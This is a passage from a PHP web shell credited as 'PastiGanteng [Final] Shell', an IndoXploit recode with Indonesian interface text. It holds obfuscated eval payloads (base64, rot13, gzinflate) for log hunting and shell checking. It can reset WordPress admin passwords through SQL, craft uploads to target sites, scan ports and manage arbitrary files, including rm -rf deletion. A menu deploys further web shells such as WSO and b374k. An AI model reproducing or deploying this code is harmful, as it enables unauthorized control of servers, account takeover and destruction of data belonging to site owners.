2636cms_add($link,$domain,$owner['name'],"osCommerce");
2637
2638}
2639}
2640}
2641}else{
2642echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2643echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>CMS</b></center></td></table><br><br>';
2644$content = file_get_contents($pageURL.'ganteng.tmp');
2645echo $content;
2646}
2647
2648} elseif($_GET['do'] == 'log_hunter') {
2649
2650 {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
2651
2652} elseif($_GET['do'] == 'shell_check') {
2653 eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
2654
2655} elseif($_GET['do'] == 'csrf') {
2656
2657 echo '<center>
2658<form method="post">
2659<span style="margin-right: 8px; color: #fff;">URL : </span><input type="text" name="url" style="margin: 4px auto; width: 25%; height: 27px; padding-left: 3px; padding-bottom: 2px;" placeholder="http://www.target.com/[path]/upload.php" style="margin 5px auto; padding-bottom: 5px; padding-left: 5px;" required><br>
2660<span style="color: #fff;">POST : </span><input type="text" style="width: 25%; height: 27px;" name="pf" placeholder="Filedata / files[] / qqfile / userfile / dll" required><br>
2661<input class="submit" type="submit" name="d" value="Lock!">
2662</form>';
2663
2664$url = $_POST['url'];
2665$pf = $_POST['pf'];
2666$d = $_POST['d'];
2667if($d) {
2668 echo "<form align='center' method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input class='submit' type='submit' name='g' value='Upload beb'></form>";
2669}
2670
2671
2672} elseif($_GET['do'] == 'wprespw') {
2673
2674
2675echo "<center><h2><font color='lime'>WP Reset Password</font></h2><br>";
2676
2677 if(empty($_POST['pwd'])){
2678
2679echo "<FORM method='POST'>
2680<table style='width:300px;'> <tr><th colspan='2'>Connect to MySQL server</th></tr> <tr><td> Hostname</td><td>
2681<input style='width:220px;' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
2682<input style='width:220px;' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
2683<input style='width:220px;' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
2684<input style='width:220px;' type='text' name='password' value='**' /></td></tr>
2685<tr><td> User baru</td><td>
2686<input style='width:220px;' type='text' name='admin' value='admin' /></td></tr>
2687 <tr><td> Pass Baru</td><td>
2688<input style='width:80px;' type='text' name='pwd' value='123456' />
2689
2690<input style='width:100px;' type='submit' value='ubah >' name='send' /></FORM>
2691</td></tr> </table></center><br><br><br><br>
2692";
2693}else{
2694$localhost = $_POST['localhost'];
2695$database = $_POST['database'];
2696$username = $_POST['username'];
2697$password = $_POST['password'];
2698$pwd = $_POST['pwd'];
2699$admin = $_POST['admin'];
2700
2701
2702 @mysql_connect($localhost,$username,$password) or die(mysql_error());
2703 @mysql_select_db($database) or die(mysql_error());
2704
2705$hash = crypt($pwd);
2706$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
2707$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
2708$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
2709$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
2710$a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
2711$a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
2712$a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
2713
2714
2715if($a4s){
2716echo "<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ";
2717}
2718
2719}
2720
2721
2722} elseif($_GET['do'] == 'zip_menu') {
2723
2724
2725 echo "<center><h1><font color='lime'>Zip Menu</font></h1>";
2726function rmdir_recursive($dir) {
2727 foreach(scandir($dir) as $file) {
2728 if ('.' === $file || '..' === $file) continue;
2729 if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
2730 else unlink("$dir/$file");
2731 }
2732 rmdir($dir);
2733}
2734if($_FILES["zip_file"]["name"]) {
2735 $filename = $_FILES["zip_file"]["name"];
2736 $source = $_FILES["zip_file"]["tmp_name"];
2737 $type = $_FILES["zip_file"]["type"];
2738 $name = explode(".", $filename);
2739 $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
2740 foreach($accepted_types as $mime_type) {
2741 if($mime_type == $type) {
2742 $okay = true;
2743 break;
2744 }
2745 }
2746 $continue = strtolower($name[1]) == 'zip' ? true : false;
2747 if(!$continue) {
2748 $message = "Ext bukan zip -_-";
2749 }
2750 $path = dirname(__FILE__).'/';
2751 $filenoext = basename ($filename, '.zip');
2752 $filenoext = basename ($filenoext, '.ZIP');
2753 $targetdir = $path . $filenoext;
2754 $targetzip = $path . $filename;
2755 if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
2756 mkdir($targetdir, 0777);
2757 if(move_uploaded_file($source, $targetzip)) {
2758 $zip = new ZipArchive();
2759 $x = $zip->open($targetzip);
2760 if ($x === true) {
2761 $zip->extractTo($targetdir);
2762 $zip->close();
2763
2764 unlink($targetzip);
2765 }
2766 $message = "<b>Sip lah gan :o</b>";
2767 } else {
2768 $message = "<b>Error asw >:(</b>";
2769 }
2770}
2771echo '<table style="width:100%" border="1">
2772 <tr><td><h2><center><font color="red">Upload And Unzip</font></center></h2><form enctype="multipart/form-data" method="post" action="">
2773<label>Zip File : <input type="file" name="zip_file" /></label>
2774<input type="submit" name="submit" value="Upload And Unzip" />
2775</form>';
2776if($message) echo "<p>$message</p>";
2777echo "</td><td><h2><center><font color='red'>Zip Backup</font></center></h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
2778 if($_POST['backup']){
2779 $save=$_POST['save'];
2780 function Zip($source, $destination)
2781{
2782 if (extension_loaded('zip') === true)
2783 {
2784 if (file_exists($source) === true)
2785 {
2786 $zip = new ZipArchive();
2787
2788 if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
2789 {
2790 $source = realpath($source);
2791
2792 if (is_dir($source) === true)
2793 {
2794 $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
2795
2796 foreach ($files as $file)
2797 {
2798 $file = realpath($file);
2799
2800 if (is_dir($file) === true)
2801 {
2802 $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
2803 }
2804
2805 else if (is_file($file) === true)
2806 {
2807 $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
2808 }
2809 }
2810 }
2811
2812 else if (is_file($source) === true)
2813 {
2814 $zip->addFromString(basename($source), file_get_contents($source));
2815 }
2816 }
2817
2818 return $zip->close();
2819 }
2820 }
2821
2822 return false;
2823}
2824 Zip($_POST['dir'],$save);
2825 echo "Done , Save To <b>$save</b>";
2826 }
2827 echo "</td><td><h2><center><font color='red'>Unzip Manual</font></center></h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
2828 if($_POST['extrak']){
2829 $save=$_POST['save'];
2830 $zip = new ZipArchive;
2831 $res = $zip->open($_POST['dir']);
2832 if ($res === TRUE) {
2833 $zip->extractTo($save);
2834 $zip->close();
2835 echo 'Success , Location : <b>'.$save.'</b>';
2836 } else {
2837 echo 'Gagal Mas :( Ntahlah !';
2838 }
2839 }
2840echo '</tr></table>';
2841
2842
2843} elseif($_GET['do'] == 'contact') {
2844
2845 echo "<center><div style='color: #fff; background: #333; width: 350px; height: 85px; padding-top: 25px; border: 1px #333; border-radius: 3px;'><span'> E-mail : xmall75.id@gmail.com <br> FB : facebook.com/bukanyimyam </span></div></center>";
2846
2847} elseif($_GET['do'] == 'whois') {
2848
2849 {
2850 ?>
2851 <form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
2852 <?php
2853 @set_time_limit(0);
2854 @error_reporting(0);
2855 function sws_domain_info($site)
2856 {
2857 $getip = @file_get_contents("http://networktools.nl/whois/$site");
2858 flush();
2859 $ip = @findit($getip,'<pre>','</pre>');
2860 return $ip;
2861 flush();
2862 }
2863 function sws_net_info($site)
2864 {
2865 $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
2866 $ip = @findit($getip,'<pre>','</pre>');
2867 return $ip;
2868 flush();
2869 }
2870 function sws_site_ser($site)
2871 {
2872 $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
2873 $ip = @findit($getip,'<pre>','</pre>');
2874 return $ip;
2875 flush();
2876 }
2877 function sws_sup_dom($site)
2878 {
2879 $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
2880 $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
2881 return $ip;
2882 flush();
2883 }
2884 function sws_port_scan($ip)
2885 {
2886 $list_post = array('80','21','22','2082','25','53','110','443','143');
2887 foreach ($list_post as $o_port)
2888 {
2889 $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
2890 if($connect)
2891 {
2892 echo " $ip : $o_port ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
2893 flush();
2894 }
2895 }
2896 }
2897 function findit($mytext,$starttag,$endtag) {
2898 $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
2899 $posRight = @stripos($mytext,$endtag,$posLeft+1);
2900 return @substr($mytext,$posLeft,$posRight-$posLeft);
2901 flush();
2902 }
2903 echo '<br><br><center>';
2904 echo '
2905 <br />
2906 <div class="sc"><form method="post"><table class="tabnet">
2907 <tr><th colspan="5">Website Whois</th></tr>
2908 <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" value="site.com" />   <input type="submit" style="color:#00ff00;background-color:#000000" name="scan" value=">>" /></td></tr>
2909 </table></form></div>
2910 <br>
2911 <span style="font-size: 16px;">Masukin site tanpa http</span>';
2912 if(isset($_POST['scan']))
2913 {
2914 $site = @htmlentities($_POST['site']);
2915 if (empty($site)){die('<br /><br /> Not add IP .. !');}
2916 $ip_port = @gethostbyname($site);
2917 echo "
2918 <br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
2919 <div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
2920 <div class=\"ru\"> <br /><br /><pre>
2921 ";
2922 echo "".sws_port_scan($ip_port)." </pre></div> ";
2923 flush();
2924 echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
2925 <div class=\"ru\">
2926 <pre>".sws_domain_info($site)."</pre></div>";
2927 flush();
2928 echo "
2929 <div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
2930 <div class=\"ru\">
2931 <pre>".sws_net_info($site)."</pre> </div>";
2932 flush();
2933 echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
2934 <div class=\"ru\">
2935 <pre>".sws_sup_dom($site)."</pre> </div>";
2936 flush();
2937 echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
2938 <div class=\"ru\">
2939 <pre>".sws_site_ser($site)."</pre> </div>
2940 <div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
2941 flush();
2942 }
2943 echo '</center>';
2944 }
2945
2946} elseif($_GET['act'] == 'newfile') {
2947 if($_POST['new_save_file']) {
2948 $newfile = htmlspecialchars($_POST['newfile']);
2949 $fopen = fopen($newfile, "a+");
2950 if($fopen) {
2951 $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2952 } else {
2953 $act = "<font color=red>permission denied</font>";
2954 }
2955 }
2956 echo $act;
2957 echo "<form method='post'>
2958 Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2959 <input type='submit' name='new_save_file' value='Submit'>
2960 </form>";
2961} elseif($_GET['act'] == 'newfolder') {
2962 if($_POST['new_save_folder']) {
2963 $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2964 if(!mkdir($new_folder)) {
2965 $act = "<font color=red>permission denied</font>";
2966 } else {
2967 $act = "<script>window.location='?dir=".$dir."';</script>";
2968 }
2969 }
2970 echo $act;
2971 echo "<form method='post'>
2972 Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2973 <input type='submit' name='new_save_folder' value='Submit'>
2974 </form>";
2975} elseif($_GET['act'] == 'rename_dir') {
2976 if($_POST['dir_rename']) {
2977 $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2978 if($dir_rename) {
2979 $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2980 } else {
2981 $act = "<font color=red>permission denied</font>";
2982 }
2983 echo "".$act."<br>";
2984 }
2985 echo "<form method='post'>
2986 <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2987 <input type='submit' name='dir_rename' value='rename'>
2988 </form>";
2989} elseif($_GET['act'] == 'delete_dir') {
2990 if(is_dir($dir)) {
2991 if(is_writable($dir)) {
2992 @rmdir($dir);
2993 @exe("rm -rf $dir");
2994 @exe("rmdir /s /q $dir");
2995 $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2996 } else {
2997 $act = "<font color=red>could not remove ".basename($dir)."</font>";
2998 }
2999 }
3000 echo $act;
3001} elseif($_GET['act'] == 'view') {
3002 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3003 echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
3004} elseif($_GET['act'] == 'edit') {
3005 if($_POST['save']) {
3006 $save = file_put_contents($_GET['file'], $_POST['src']);
3007 if($save) {
3008 $act = "<font color=lime>Saved!</font>";
3009 } else {
3010 $act = "<font color=red>permission denied</font>";
3011 }
3012 echo "".$act."<br>";
3013 }
3014 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3015 echo "<form method='post'>
3016 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
3017 <input type='submit' value='Save' name='save' style='width: 500px;'>
3018 </form>";
3019
3020
3021} elseif($_GET['act'] == 'rename') {
3022 if($_POST['do_rename']) {
3023 $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
3024 if($rename) {
3025 $act = "<script>window.location='?dir=".$dir."';</script>";
3026 } else {
3027 $act = "<font color=red>permission denied</font>";
3028 }
3029 echo "".$act."<br>";
3030 }
3031 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3032 echo "<form method='post'>
3033 <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
3034 <input type='submit' name='do_rename' value='rename'>
3035 </form>";
3036} elseif($_GET['act'] == 'delete') {
3037 $delete = unlink($_GET['file']);
3038 if($delete) {
3039 $act = "<script>window.location='?dir=".$dir."';</script>";
3040 } else {
3041 $act = "<font color=red>permission denied</font>";
3042 }
3043 echo $act;
3044
3045} else {
3046 if(is_dir($dir) === true) {
3047 if(!is_readable($dir)) {
3048 echo "<font color=red>can't open directory. ( not readable )</font>";
3049 } else {
3050 echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
3051 <tr class="atas">
3052 <th class="th_home"><center>Name</center></th>
3053 <th class="th_home"><center>Type</center></th>
3054 <th class="th_home"><center>Size</center></th>
3055 <th class="th_home"><center>Last Modified</center></th>
3056 <th class="th_home"><center>Owner/Group</center></th>
3057 <th class="th_home"><center>Permission</center></th>
3058 <th class="th_home"><center>Action</center></th>
3059 </tr>';
3060 $scandir = scandir($dir);
3061 foreach($scandir as $dirx) {
3062 $dtype = filetype("$dir/$dirx");
3063 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
3064 if(function_exists('posix_getpwuid')) {
3065 $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
3066 $downer = $downer['name'];
3067 } else {
3068 //$downer = $uid;
3069 $downer = fileowner("$dir/$dirx");
3070 }
3071 if(function_exists('posix_getgrgid')) {
3072 $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
3073 $dgrp = $dgrp['name'];
3074 } else {
3075 $dgrp = filegroup("$dir/$dirx");
3076 }
3077 if(!is_dir("$dir/$dirx")) continue;
3078 if($dirx === '..') {
3079 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
3080 } elseif($dirx === '.') {
3081 $href = "<a href='?dir=$dir'>$dirx</a>";
3082 } else {
3083 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
3084 }
3085 if($dirx === '.' || $dirx === '..') {
3086 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
3087 } else {
3088 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
3089 }
3090 echo "<tr>";
3091 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
3092 echo "<td class='td_home'><center>$dtype</center></td>";
3093 echo "<td class='td_home'><center>-</center></th></td>";
3094 echo "<td class='td_home'><center>$dtime</center></td>";
3095 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
3096 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
3097 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
3098 echo "</tr>";
3099 }
3100 }
3101 } else {
3102 echo "<font color=red>can't open directory.</font>";
3103 }
3104 foreach($scandir as $file) {
3105 $ftype = filetype("$dir/$file");
3106 $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
3107 $size = filesize("$dir/$file")/1024;
3108 $size = round($size,3);
3109 if(function_exists('posix_getpwuid')) {
3110 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
3111 $fowner = $fowner['name'];
3112 } else {
3113 //$downer = $uid;
3114 $fowner = fileowner("$dir/$file");
3115 }
3116 if(function_exists('posix_getgrgid')) {
3117 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
3118 $fgrp = $fgrp['name'];
3119 } else {
3120 $fgrp = filegroup("$dir/$file");
3121 }
3122 if($size > 1024) {
3123 $size = round($size/1024,2). 'MB';
3124 } else {
3125 $size = $size. 'KB';
3126 }
3127 if(!is_file("$dir/$file")) continue;
3128 echo "<tr>";
3129 echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
3130 echo "<td class='td_home'><center>$ftype</center></td>";
3131 echo "<td class='td_home'><center>$size</center></td>";
3132 echo "<td class='td_home'><center>$ftime</center></td>";
3133 echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
3134 echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
3135 echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
3136 echo "</tr>";
3137 }
3138 echo "</table>";
3139 if(!is_readable($dir)) {
3140 //
3141 } else {
3142 echo "<hr color='#333'>";
3143 }
3144
3145}
3146?>
3147
3148<?php
3149
3150$tool = "http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
3151
3152echo "<hr color='#333'>";
3153echo "<br>";
3154echo "
3155<center><form>
3156<select onchange='if (this.value) window.open(this.value);'>
3157 <option selected='selected' value=''> Summon Shell </option>
3158 <option class='lightblue' value='$tool=ganteng1'>PastiGanteng V.1</option>
3159 <option class='red' value='$tool=45v17'>1945v2017</option>
3160 <option class='lightblue' value='$tool=wso251'>WSO 2.5.1</option>
3161 <option class='red' value='$tool=wso28'>WSO 2.8</option>
3162 <option class='lightblue' value='$tool=wso30'>WSO 3.0</option>
3163 <option class='red' value='$tool=injection'>1n73ction v3</option>
3164 <option class='lightblue' value='$tool=b374k'>b374k Shell</option>
3165 <option class='red' value='$tool=blackhat'>BlackHat Shell</option>
3166 <option class='lightblue' value='$tool=brudul'>Brudul Shell</option>
3167 <option class='red' value='$tool=mad2'>Madspot V.2 Shell</option>
3168 <option class='lightblue' value='$tool=idx2'>IndoXploit V.2</option>
3169 <option class='red' value='$tool=idx3'>IndoXploit V.3</option>
3170 <option class='lightblue' value='$tool=noname'>Noname Shell</option>
3171</select>
3172</form>
3173<noscript><input type='submit' value='Submit'></noscript>";
3174echo "<br><hr color='#333'>Copyright © 2017 - <font color=lime>PastiGanteng [Final] Shell</font> - IndoXploit Shell Recoded by <a href='https://xmall75.blogspot.com' target='_blank'><font color=lime>Xmall75</font></a> - <a href='https://www.facebook.com/SCyberArt/' target='_blank'><font color=lime>Security Cyber Art</font></a></center>";
3175echo "<br>";
3176?>
3177
3178</html>